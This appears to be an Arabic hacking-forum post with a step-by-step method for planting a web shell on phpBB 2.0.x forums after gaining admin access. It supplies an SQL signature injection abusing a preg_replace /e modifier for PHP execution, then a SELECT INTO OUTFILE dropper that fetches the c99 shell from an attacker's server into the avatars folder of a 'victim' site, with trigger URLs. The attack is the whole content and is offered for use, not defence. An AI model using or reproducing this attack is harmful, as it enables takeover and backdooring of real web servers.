السلام عليكم ورحمه الله وبركاته
مجرب على : PHPBB 2.0.19 , 2.0.23
إذا كان لديك ادمين فروم PHPBB ولم تستطع رفع الشيل ، إذا ألحل هنا وحصريا ...
1. تدخل على administration پانل
2. حرر ملف جديد في جهازك shell.sql وضع هذا آلكود sql
كود:
UPDATE users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo();' WHERE user_id=YOUR_ID;
YOUR_ID هو ID بتاعك في فروم ، تقدر تستعمل 2 إلي هو تاع admin forum
3.إذهب الى Restore Database و اعمل upload للملف shell.sql
4. إذهب الى EDIT account في forum و ليس administration پانل
Wow
يمكنك رؤية phpinfo تعمل ....
يمكنك الآن كتآبة اي كودPHP آخر لوووووووووووول
هذا آلكود لرفع الشيل :
كود:
#
# Table Data for phpbb_categories
#
SELECT '<?php $l=fopen("/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php","a+") or die("Could not open file!"); fwrite($l,file_get_*******s("http://www.your_server.com/c99.php.txt"));fclose($l); ?>' INTO OUTFILE '/home/local/httpd/virtual/site_victime/htdocs/forum/images/avatars/uploder_shell.php';
http://www.your_server.com/c99.php.txt
بعد upload، تفتح الصفحة :
http://www.vicitm_site.com/forum/ima...oder_shell.php
بعدها، الصفحة shell.php تتكون دآخل آلمجلد avatars
يمكنك تغيير المسار :
/home/local/httpd/virtual/victim_site/htdocs/forum/images/avatars/shell.php
على حسب السيرفر
إفتح الصفحة لتشغيل الشيل --->
http://www.vicitm_site.com/forum/ima...tars/shell.php
وسلام
pwvd F vtu hgadg uk 'vdr PHPBB admin D